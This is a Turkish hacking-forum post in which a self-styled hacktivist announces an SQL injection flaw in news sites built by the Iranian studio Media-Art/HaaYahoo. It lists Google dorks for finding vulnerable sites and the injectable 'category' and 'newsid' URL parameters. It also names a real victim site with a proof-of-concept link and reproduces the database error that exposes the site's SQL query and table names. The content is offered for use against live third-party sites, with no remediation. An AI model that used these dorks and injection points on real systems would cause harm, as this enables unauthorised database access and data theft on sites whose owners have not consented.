Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Media-Art HaaYahoo طراحی و اجرا: هنر رسانه SQL Inj
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2742
Mesaj Sayısı: 6282
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Media-Art HaaYahoo طراحی و اجرا: هنر رسانه SQL Inj
30.09.2018 02:59
################################################################################​##############################

# Exploit Title : Media-Art.ir HaaYahoo Web Design Studio Iran طراحی و اجرا: هنر رسانه SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : media-art.ir ~ haayahoo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​##############################

# Google Dorks :

intext:''طراحی و اجرا: هنر رسانه''

intext:''مجری سایت: هنررسانه''

intext:''طراحی و توسعه هیاهـو''

# SQL Injection Exploits :

/newspaper/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]

/newspaper/index.php?year=%7Bdate-year%7D&month=%7Bdate-month%7D&day=%7Bdate-day%7D&category=[SQL Injection]

/news/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]

/PATH/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]

/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]

/newspaper/index.php?newsid=[SQL Injection]

/newspaper/engine/print.php?newsid=[SQL Injection]

/index.php?newsid=[SQL Injection]

################################################################################​##############################

# Example Vulnerable Site =>

jahansanat.ir/newspaper/index.php?year=1396&month=01&day=28&category=[SQL] => [ Proof of Concept ] => archive.is/YXXPC

# SQL Database Error =>

MySQL error in file: /engine/modules/show.short.php at line 65
Error Number: 1064
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near 'AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date < '2018-09-30 ' at line 1
SQL query:

SELECT p.id, p.autor, p.date, p.short_story, CHAR_LENGTH(p.full_story) as full_story, p.xfields, p.title,
p.category, p.alt_name, p.comm_num, p.allow_comm, p.fixed, p.tags, e.news_read, e.allow_rate, e.rating, e.vote_num,
e.votes, e.view_edit, e.editdate, e.editor, e.reason FROM dle_post p LEFT JOIN dle_post_extras e ON (p.id=e.news_id)
WHERE date >= '2017-04-17' AND category= AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date
< '2018-09-30 03:13:55' ORDER BY date DESC LIMIT 0,1

################################################################################​##############################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi